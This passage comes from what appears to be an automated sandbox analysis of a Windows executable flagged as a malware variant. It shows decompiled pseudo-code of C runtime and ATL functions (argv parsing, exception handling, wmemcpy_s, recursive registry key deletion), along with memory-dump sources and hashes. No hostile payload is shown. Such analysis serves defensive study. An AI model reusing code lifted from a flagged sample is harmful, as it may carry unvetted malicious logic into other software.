                      						_v28 = 1;
                      						L6:
                      						_v32 = _v28;
                      						__eflags = _v32;
                      						if(__eflags == 0) {
                      							_t116 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0, L"%ls", L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments");
                      							_t159 = _t159 + 0x18;
                      							__eflags = _t116 - 1;
                      							if(_t116 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v32;
                      						if(_v32 != 0) {
                      							_push(0);
                      							E0099B670();
                      							_v52 = 0x104;
                      							_v56 = 0;
                      							E0099ACA0( &_v56, "C:\Users\hardz\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe",  &_v52);
                      							_v60 = 0xb30718;
                      							E0099B3E0( &_v60);
                      							_push(0);
                      							_v20 = E0099B770();
                      							__eflags = _v20;
                      							if(_v20 == 0) {
                      								L14:
                      								_v36 = 0xb30718;
                      								L15:
                      								_v40 = _v36;
                      								_v12 = 0;
                      								_v24 = 0;
                      								E0099ACE0(_v40, 0, 0,  &_v12,  &_v24);
                      								E0099B460( &_v8, E0099B890(_t156, _v12, _v24, 1));
                      								_t84 = E0099B520( &_v8);
                      								__eflags = _t84 & 0x000000ff;
                      								if((_t84 & 0x000000ff) != 0) {
                      									_v44 = E0099B6D0( &_v8);
                      									_v68 = E0099B6D0( &_v8) + _v12 * 4;
                      									E0099ACE0(_v40, _v44, _v68,  &_v12,  &_v24);
                      									__eflags = _a4 - 1;
                      									if(_a4 != 1) {
                      										E0099B480( &_v16, 0);
                      										_v48 = E0099B690(_v44, E0099B730( &_v16));
                      										__eflags = _v48;
                      										if(_v48 == 0) {
                      											 *0xb3153c = E0099B590(E0099B440( &_v84,  &_v16));
                      											_t97 = E0099B610( &_v16);
                      											_push(0);
                      											 *((intOrPtr*)(E0099B750())) = _t97;
                      											_v80 = 0;
                      											E0099B4E0( &_v16);
                      											E0099B4C0( &_v8);
                      											return _v80;
                      										}
                      										_v76 = _v48;
                      										E0099B4E0( &_v16);
                      										E0099B4C0( &_v8);
                      										return _v76;
                      									}
                      									 *0xb3153c = _v12 - 1;
                      									_t105 = E0099B5E0( &_v8);
                      									_push(0);
                      									 *((intOrPtr*)(E0099B750())) = _t105;
                      									_v72 = 0;
                      									E0099B4C0( &_v8);
                      									return _v72;
                      								}
                      								 *((intOrPtr*)(L00992F70( &_v8))) = 0xc;
                      								_v64 = 0xc;
                      								E0099B4C0( &_v8);
                      								return _v64;
                      							}
                      							_t112 = _v20;
                      							__eflags =  *_t112;
                      							if( *_t112 == 0) {
                      								goto L14;
                      							}
                      							_v36 = _v20;
                      							goto L15;
                      						} else {
                      							 *((intOrPtr*)(L00992F70(_t118))) = 0x16;
                      							E00992900(L"mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments", L"common_configure_argv", L"minkernel\\crts\\ucrt\\src\\appcrt\\startup\\argv_parsing.cpp", 0x14a, 0);
                      							return 0x16;
                      						}
                      					}
                      					__eflags = _a4 - 1;
                      					if(_a4 == 1) {
                      						goto L5;
                      					}
                      					_v28 = 0;
                      					goto L6;
                      				}
                      				return 0;
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$C:\Users\user\Desktop\SecuriteInfo.com.Variant.Jaik.73085.20962.exe$common_configure_argv$minkernel\crts\ucrt\src\appcrt\startup\argv_parsing.cpp$mode == _crt_argv_expanded_arguments || mode == _crt_argv_unexpanded_arguments
                      • API String ID: 0-1997232450
                      • Opcode ID: 307edc8588b8f005f1b6fc5241de793c70e29a9a94529e16d947927f3abef797
                      • Instruction ID: a2bf5189a0787c1f7b34360edd3fa09d3523566226fa6095389e8dc1b6becda3
                      • Opcode Fuzzy Hash: 307edc8588b8f005f1b6fc5241de793c70e29a9a94529e16d947927f3abef797
                      • Instruction Fuzzy Hash: DE7131B1D0020CEBDF04EF98D986BEE77B8EF94704F104559E1056B291EB796E44CB92
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 83%
                      			E0095D500(void* __ebx, void* __ecx, void* __edi, void* __esi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, signed int _a32) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				char _v28;
                      				void* _t75;
                      				void* _t76;
                      				signed char _t77;
                      				void* _t80;
                      				void* _t87;
                      				signed char _t88;
                      				void* _t126;
                      				void* _t127;
                      				void* _t130;
                      				void* _t131;
                      
                      				_t125 = __esi;
                      				_t124 = __edi;
                      				_t91 = __ecx;
                      				_t90 = __ebx;
                      				E0095E290(__ecx, _a12);
                      				_t127 = _t126 + 4;
                      				if( *((intOrPtr*)(E0095C670(__ebx, _t91, __edi, __esi) + 0x20)) != 0 ||  *_a4 == 0xe06d7363 ||  *_a4 == 0x80000026) {
                      					L6:
                      					if(( *(_a4 + 4) & 0x00000066) == 0) {
                      						E0095D6F0( &_v28, _a20, 0);
                      						if(E0095E140( &_v28) != 0) {
                      							L16:
                      							if( *_a4 != 0xe06d7363 ||  *((intOrPtr*)(_a4 + 0x10)) < 3 ||  *((intOrPtr*)(_a4 + 0x14)) <= 0x19930522) {
                      								L21:
                      								E0095CD60(_t90, _t124, _t125, _a4, _a8, _a12, _a16, _a20, _a32 & 0x000000ff, _a24, _a28);
                      								L22:
                      								return 1;
                      							} else {
                      								_v8 =  *((intOrPtr*)( *((intOrPtr*)(_a4 + 0x1c)) + 8));
                      								if(_v8 == 0) {
                      									goto L21;
                      								}
                      								_v16 = _v8;
                      								_v12 = _v16;
                      								 *0x9d62b0(_a4, _a8, _a12, _a16, _a20, _a24, _a28, _a32 & 0x000000ff);
                      								_v20 = _v12();
                      								return _v20;
                      							}
                      						}
                      						_t75 = E0095E130(_a20);
                      						_t130 = _t127 + 4;
                      						if(_t75 < 0x19930521) {
                      							L14:
                      							_t106 = _a20;
                      							_t76 = E0095E130(_a20);
                      							_t131 = _t130 + 4;
                      							if(_t76 < 0x19930522) {
                      								goto L22;
                      							}
                      							_t77 = E0095E190(_t106, _a20);
                      							_t127 = _t131 + 4;
                      							if((_t77 & 0x000000ff) == 0) {
                      								goto L22;
                      							}
                      							goto L16;
                      						}
                      						_t80 = E0095E100(_a20);
                      						_t127 = _t130 + 4;
                      						if(_t80 != 0) {
                      							goto L16;
                      						}
                      						goto L14;
                      					}
                      					if(L0095DF10(_a16, _a20) != 0 && _a24 == 0) {
                      						E0095DD70(_a8, _a16, _a20);
                      					}
                      					return 1;
                      				} else {
                      					_t87 = E0095E130(_a20);
                      					_t127 = _t127 + 4;
                      					if(_t87 < 0x19930522) {
                      						goto L6;
                      					}
                      					_t88 = E0095E160(_a20, _a20);
                      					_t127 = _t127 + 4;
                      					if((_t88 & 0x000000ff) == 0) {
                      						goto L6;
                      					}
                      					return 1;
                      				}
                      			}

                      APIs
                      • ___except_validate_context_record.LIBVCRUNTIMED ref: 0095D50A
                        • Part of subcall function 0095E290: __guard_icall_checks_enforced.LIBCMTD ref: 0095E296
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095D512
                      • __FrameHandler3::isEHs.LIBVCRUNTIMED ref: 0095D54A
                      • __FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIMED ref: 0095D594
                      • _Smanip.LIBCPMTD ref: 0095D5AF
                      • __FrameHandler3::isNoExcept.LIBVCRUNTIMED ref: 0095D5FE
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Frame$Handler3::is$EmptyExceptHandler3::SmanipStateUnwind___except_validate_context_record___vcrt_getptd__guard_icall_checks_enforced
                      • String ID: csm$csm
                      • API String ID: 2671830719-3733052814
                      • Opcode ID: dcdc720e0a52286f8c7bdf5c390408315b3444933772a82f5f6f4af3ef98bf9c
                      • Instruction ID: 6899933bd35c6f115e24e891f7a182e5c924938c979ef8e4e73da7b40304ad27
                      • Opcode Fuzzy Hash: dcdc720e0a52286f8c7bdf5c390408315b3444933772a82f5f6f4af3ef98bf9c
                      • Instruction Fuzzy Hash: 135181B5901109ABDF18DF96D881EAF37B9AF98306F044418FD098B241E735EE96CBD1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 90%
                      			E0095D280(void* __ebx, void* __ecx, void* __edi, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28, intOrPtr _a32) {
                      				signed int* _v8;
                      				intOrPtr _v12;
                      				char _v16;
                      				char _v24;
                      				char _v32;
                      				char _v40;
                      				intOrPtr _v44;
                      				char _v48;
                      				intOrPtr _v64;
                      				char _v68;
                      				void* __esi;
                      				intOrPtr* _t56;
                      				signed char _t61;
                      				void* _t78;
                      				void* _t79;
                      				void* _t83;
                      				void* _t125;
                      				void* _t126;
                      
                      				_t123 = __edi;
                      				_t84 = __ebx;
                      				_t56 = _a4;
                      				if( *_t56 == 0x80000003) {
                      					return _t56;
                      				}
                      				if( *((intOrPtr*)(E0095C670(__ebx, __ecx, __edi, _t124) + 8)) != 0) {
                      					_t78 = E0095C670(__ebx, __ecx, __edi, _t124);
                      					_t124 = _t78;
                      					_t79 = E0095E220(0);
                      					_t125 = _t125 + 4;
                      					if( *((intOrPtr*)(_t78 + 8)) != _t79 &&  *_a4 != 0xe0434f4d &&  *_a4 != 0xe0434352) {
                      						_t83 = E00959820(_a4, _a8, _a12, _a16, _a20, _a28, _a32);
                      						_t125 = _t125 + 0x1c;
                      						if(_t83 != 0) {
                      							return _t83;
                      						}
                      					}
                      				}
                      				E0095D6F0( &_v24, _a20, 0);
                      				if(E0095E140( &_v24) <= 0) {
                      					L009A0DE0(_t84,  &_v24, _t123, _t124);
                      				}
                      				_t61 = E0095E140( &_v24);
                      				if(_t61 > 0) {
                      					E009596D0(_t84, _t123, _t124,  &_v48,  &_v24, _a24, _a16, _a20, _a28);
                      					_t126 = _t125 + 0x18;
                      					_v16 = _v48;
                      					_v12 = _v44;
                      					while(1) {
                      						_t61 = E0095D950( &_v16,  &_v40);
                      						if((_t61 & 0x000000ff) == 0) {
                      							goto L23;
                      						}
                      						E0095D8C0( &_v16,  &_v68);
                      						if(_v68 > _a24 || _a24 > _v64) {
                      							goto L13;
                      						} else {
                      							_push(0);
                      							_push(0);
                      							E0095D6C0( &_v32,  &_v68);
                      							_v8 = E0095E110( &_v32);
                      							if(_v8[1] == 0 ||  *((char*)(_v8[1] + 8)) == 0) {
                      								if(( *_v8 & 0x00000040) == 0) {
                      									_push(0);
                      									_push(1);
                      									E0095CC90(_a4, _a8, _a12, _a16, _a20, _v8, 0,  &_v68, _a28, _a32);
                      									_t126 = _t126 + 0x30;
                      									goto L13;
                      								} else {
                      									goto L21;
                      								}
                      							} else {
                      								L21:
                      								L13:
                      								E0095D930( &_v16);
                      								continue;
                      							}
                      						}
                      						goto L23;
                      					}
                      				}
                      				L23:
                      				return _t61;
                      			}

                      APIs
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095D297
                      • ___vcrt_getptd.LIBVCRUNTIMED ref: 0095D2A2
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: ___vcrt_getptd
                      • String ID: MOC$RCC
                      • API String ID: 984050374-2084237596
                      • Opcode ID: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction ID: f3cfa835f95752569d835a4dba1e4aeb09214f27a3f6054768f248a43273c586
                      • Opcode Fuzzy Hash: c73bb0183ecdf91fe604f38042492638d038765aa04ba797440bf0163dd74fdd
                      • Instruction Fuzzy Hash: 16515E71901109EBCB14DF96C881FEE73B9AF88302F148558FD1697291DB34EE49CBA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 94%
                      			E0096B750(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
                      				intOrPtr _v8;
                      				intOrPtr _v12;
                      				intOrPtr _v16;
                      				intOrPtr _v20;
                      				intOrPtr _v24;
                      				intOrPtr _v28;
                      				void* _t39;
                      				void* _t43;
                      				void* _t50;
                      				void* _t52;
                      				void* _t60;
                      				void* _t61;
                      
                      				_t52 = __ecx;
                      				if(_a16 == 0) {
                      					return 0;
                      				}
                      				__eflags = _a4;
                      				if(_a4 == 0) {
                      					_v8 = 0;
                      				} else {
                      					_v8 = 1;
                      				}
                      				_v12 = _v8;
                      				__eflags = _v12;
                      				if(__eflags == 0) {
                      					_t50 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0, L"%ls", L"destination != nullptr");
                      					_t60 = _t60 + 0x18;
                      					__eflags = _t50 - 1;
                      					if(_t50 == 1) {
                      						asm("int3");
                      					}
                      				}
                      				__eflags = _v12;
                      				if(_v12 != 0) {
                      					__eflags = _a12;
                      					if(_a12 == 0) {
                      						L12:
                      						_t53 = _a4;
                      						E0096B920(_a4, _a4, 0, _a8);
                      						_t61 = _t60 + 0xc;
                      						__eflags = _a12;
                      						if(_a12 == 0) {
                      							_v16 = 0;
                      						} else {
                      							_v16 = 1;
                      						}
                      						_v20 = _v16;
                      						__eflags = _v20;
                      						if(__eflags == 0) {
                      							_t43 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0, L"%ls", L"source != nullptr");
                      							_t61 = _t61 + 0x18;
                      							__eflags = _t43 - 1;
                      							if(_t43 == 1) {
                      								asm("int3");
                      							}
                      						}
                      						__eflags = _v20;
                      						if(_v20 != 0) {
                      							_t54 = _a8;
                      							__eflags = _a8 - _a16;
                      							if(_a8 < _a16) {
                      								_v24 = 0;
                      							} else {
                      								_v24 = 1;
                      							}
                      							_v28 = _v24;
                      							__eflags = _v28;
                      							if(__eflags == 0) {
                      								_t39 = L00994930(__eflags, 2, L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0, L"%ls", L"size_in_elements >= count");
                      								_t61 = _t61 + 0x18;
                      								__eflags = _t39 - 1;
                      								if(_t39 == 1) {
                      									asm("int3");
                      								}
                      							}
                      							__eflags = _v28;
                      							if(_v28 != 0) {
                      								return 0x16;
                      							} else {
                      								 *((intOrPtr*)(L00992F70(_t54))) = 0x22;
                      								E00992900(L"size_in_elements >= count", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x24, 0);
                      								return 0x22;
                      							}
                      						} else {
                      							 *((intOrPtr*)(L00992F70(_t53))) = 0x16;
                      							E00992900(L"source != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x23, 0);
                      							return 0x16;
                      						}
                      					}
                      					__eflags = _a8 - _a16;
                      					if(_a8 >= _a16) {
                      						E0096B730(_a4, _a12, _a16);
                      						__eflags = 0;
                      						return 0;
                      					}
                      					goto L12;
                      				} else {
                      					 *((intOrPtr*)(L00992F70(_t52))) = 0x16;
                      					E00992900(L"destination != nullptr", L"wmemcpy_s", L"minkernel\\crts\\ucrt\\src\\appcrt\\string\\wmemcpy_s.cpp", 0x1c, 0);
                      					return 0x16;
                      				}
                      			}

                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID:
                      • String ID: %ls$destination != nullptr$minkernel\crts\ucrt\src\appcrt\string\wmemcpy_s.cpp$size_in_elements >= count$source != nullptr$wmemcpy_s
                      • API String ID: 0-1746489773
                      • Opcode ID: 45a79a39952309a2dc4a6cd036e614e35a4070ff966c12a855ddfbf7ceac4c5f
                      • Instruction ID: 1bf6dba2bda401904c99a05fcbd67fc314036110e5a252c275a3600c1d96e1e6
                      • Opcode Fuzzy Hash: 45a79a39952309a2dc4a6cd036e614e35a4070ff966c12a855ddfbf7ceac4c5f
                      • Instruction Fuzzy Hash: 9C412571EC0309BBDF20AF54CD46BAE7769AB9470CF208455F505A72C2E3B59AC0DB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 80%
                      			E00968D00(void* __ebx, void* __edi, void* __esi, signed char _a4) {
                      				signed int _v8;
                      				char _v24;
                      				signed char _v25;
                      				intOrPtr _v32;
                      				intOrPtr _v36;
                      				intOrPtr _v40;
                      				intOrPtr _v44;
                      				intOrPtr _v48;
                      				char _v56;
                      				intOrPtr _v60;
                      				char _v64;
                      				intOrPtr _v68;
                      				char _v72;
                      				signed char _v76;
                      				char _v80;
                      				char _v88;
                      				char _v96;
                      				char _v104;
                      				signed int _t45;
                      				char* _t47;
                      				intOrPtr _t50;
                      				char* _t76;
                      				intOrPtr _t93;
                      				intOrPtr _t95;
                      				signed int _t98;
                      
                      				_t97 = __esi;
                      				_t96 = __edi;
                      				_t74 = __ebx;
                      				_t45 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t45 ^ _t98;
                      				_t47 =  *0xb30640; // 0x0
                      				if( *_t47 != 0x58) {
                      					_t76 =  *0xb30640; // 0x0
                      					_t92 =  *_t76;
                      					if(_t92 != 0x3f) {
                      						E00966AB0(__ebx, __edi, __esi, _a4, E0095F3F0( &_v104));
                      						_t50 = _a4;
                      					} else {
                      						E00967C80(__ebx, __edi, __esi,  &_v56);
                      						if(E0096A510() == 0 ||  *0xb30650 == 0) {
                      							_v80 = E00960060("`template-parameter", 0x13);
                      							_v76 = _t92;
                      							_t92 =  &_v96;
                      							_v48 = E0095FAA0( &_v96,  &_v80,  &_v56);
                      							E0095FBB0(_v48, _a4, 0x27);
                      							_t50 = _a4;
                      						} else {
                      							E00967D80( &_v56,  &_v24, 0x10);
                      							_t93 =  *0xb30650; // 0x0
                      							_v40 = _t93;
                      							_v32 = _v40;
                      							 *0x9d62b0(E009A2B00( &_v24));
                      							_v36 = _v32();
                      							if(_v36 == 0) {
                      								_v72 = E00960060("`template-parameter", 0x13);
                      								_v68 = _t93;
                      								_v44 = E0095FAA0( &_v88,  &_v72,  &_v56);
                      								_t92 = _a4;
                      								E0095FBB0(_v44, _a4, 0x27);
                      								_t50 = _a4;
                      							} else {
                      								_t92 = 0;
                      								_v25 = 0;
                      								_push(_v25 & 0x000000ff);
                      								E0095E750(_a4, _v36);
                      								_t50 = _a4;
                      							}
                      						}
                      					}
                      				} else {
                      					_t95 =  *0xb30640; // 0x0
                      					_t92 = _t95 + 1;
                      					 *0xb30640 = _t92;
                      					_v64 = E00960060("void", 4);
                      					_v60 = _t92;
                      					E0095F1F0(_a4,  &_v64);
                      					_t50 = _a4;
                      				}
                      				return E00957280(_t50, _t74, _v8 ^ _t98, _t92, _t96, _t97);
                      			}

                      APIs
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: Name::getString
                      • String ID: `template-parameter$void
                      • API String ID: 1028460119-4057429177
                      • Opcode ID: 3e5a260dfdfea45250484fa18af67fcddc812ba9877aeeb37baafc6cc0c81dac
                      • Instruction ID: 9e06e97d32025a6ac1d5b1ec69b465b5e6265a99c5c505df4aeb436648fd184a
                      • Opcode Fuzzy Hash: 3e5a260dfdfea45250484fa18af67fcddc812ba9877aeeb37baafc6cc0c81dac
                      • Instruction Fuzzy Hash: CE4157B1D04108DFDB04EFD4ED92AEE7BB5BF88305F148129F50AA7291EB316A05CB51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      C-Code - Quality: 91%
                      			E00944A80(void* __ebx, void* __ecx, void* __edi, void* __esi, void* __eflags, void* _a4) {
                      				signed int _v8;
                      				intOrPtr* _v12;
                      				void* _v28;
                      				void* _v36;
                      				struct _FILETIME _v48;
                      				int _v60;
                      				char _v324;
                      				char _v336;
                      				void* _v340;
                      				void* _v344;
                      				void* _v348;
                      				signed int _t45;
                      				long _t52;
                      				void* _t57;
                      				void* _t59;
                      				void* _t67;
                      				intOrPtr* _t74;
                      				void* _t96;
                      				void* _t98;
                      				void* _t100;
                      				void* _t101;
                      				signed int _t103;
                      				void* _t104;
                      				void* _t105;
                      
                      				_t102 = __esi;
                      				_t70 = __ebx;
                      				_push(__ecx);
                      				_t100 =  &_v348;
                      				memset(_t100, 0xcccccccc, 0x56 << 2);
                      				_t105 = _t104 + 0xc;
                      				_t101 = _t100 + 0x56;
                      				_pop(_t74);
                      				_t45 =  *0xa0600c; // 0x5d529087
                      				_v8 = _t45 ^ _t103;
                      				_v12 = _t74;
                      				E009441C0( &_v28, 0);
                      				_v36 = E009445F0( &_v28, __esi,  *_v12, _a4,  *(_v12 + 4) | 0x0002001f);
                      				if(_v36 == 0) {
                      					_v60 = 0x100;
                      					while(1) {
                      						_t102 = _t105;
                      						_t96 = _v28;
                      						_t52 = RegEnumKeyExA(_t96, 0,  &_v324,  &_v60, 0, 0, 0,  &_v48);
                      						__eflags = _t105 - _t105;
                      						__eflags = E009D1520(_t52, _t105 - _t105);
                      						if(__eflags != 0) {
                      							break;
                      						}
                      						_v36 = E00944A80(_t70,  &_v28, _t101, _t102, __eflags,  &_v324);
                      						__eflags = _v36;
                      						if(__eflags == 0) {
                      							_v60 = 0x100;
                      							continue;
                      						}
                      						_v344 = _v36;
                      						E00944220( &_v28, __eflags);
                      						_t57 = _v344;
                      						L11:
                      						E009D14C0(_t103, 0x944c08);
                      						_t59 = _t57;
                      						_t98 = _t96;
                      						return E009D1520(E00957280(_t59, _t70, _v8 ^ _t103, _t98, _t101, _t102), _t103 - _t105 + 0x158);
                      					}
                      					E00944420( &_v28, _t102);
                      					_t96 = _a4;
                      					_v348 = E00944310(_v12, _t102, _t96);
                      					E00944220( &_v28, __eflags);
                      					_t57 = _v348;
                      					goto L11;
                      				}
                      				if(_v36 != 2) {
                      					_t110 = _v36 - 3;
                      					if(_v36 != 3) {
                      						_t96 = _v36;
                      						_push(_t96);
                      						_t67 = E0094F200(0xb337b8);
                      						E009423E0(__ebx, _t101, __esi, _t110, E009423B0( &_v336, "C:\\Program Files\\Microsoft Visual Studio\\2022\\Community\\VC\\Tools\\MSVC\\14.31.31103\\atlmfc\\include\\atlbase.h", 0x18c9), _t67, 0, "CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)\n", _a4);
                      						_t105 = _t105 + 0x18;
                      					}
                      				}
                      				_v340 = _v36;
                      				E00944220( &_v28, _t110);
                      				_t57 = _v340;
                      				goto L11;
                      			}



























                      APIs
                        • Part of subcall function 009445F0: @_RTC_CheckStackVars@8.LIBCMTD ref: 009446FE
                      • _Smanip.LIBCPMTD ref: 00944B14
                        • Part of subcall function 009423E0: @_RTC_CheckStackVars@8.LIBCMTD ref: 00942473
                      • ~Module.VCCORLIBD ref: 00944B2E
                      • RegEnumKeyExA.ADVAPI32 ref: 00944B62
                      • ~Module.VCCORLIBD ref: 00944B97
                      • ~Module.VCCORLIBD ref: 00944BCA
                      • @_RTC_CheckStackVars@8.LIBCMTD ref: 00944BDF
                      Strings
                      • CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d), xrefs: 00944AF2
                      • C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h, xrefs: 00944B09
                      Memory Dump Source
                      • Source File: 00000000.00000002.282500177.0000000000941000.00000020.00000001.01000000.00000003.sdmp, Offset: 00940000, based on PE: true
                      • Associated: 00000000.00000002.282260111.0000000000940000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.284025026.00000000009D6000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293211865.0000000000A06000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.293421290.0000000000A07000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296220091.0000000000B2F000.00000008.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296243296.0000000000B30000.00000004.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296264435.0000000000B34000.00000002.00000001.01000000.00000003.sdmp
                      • Associated: 00000000.00000002.296303200.0000000000B36000.00000002.00000001.01000000.00000003.sdmp
                      Joe Sandbox IDA Plugin
                      • Snapshot File: hcaresult_0_2_940000_SecuriteInfo.jbxd
                      Similarity
                      • API ID: CheckModuleStackVars@8$EnumSmanip
                      • String ID: C:\Program Files\Microsoft Visual Studio\2022\Community\VC\Tools\MSVC\14.31.31103\atlmfc\include\atlbase.h$CRegKey::RecurseDeleteKey : Failed to Open Key %Ts(Error = %d)
                      • API String ID: 2188485312-3584847366
                      • Opcode ID: ac9158cd44979364038237aa202e27735b483e05ce12b59a5e96faaf2b0618ba
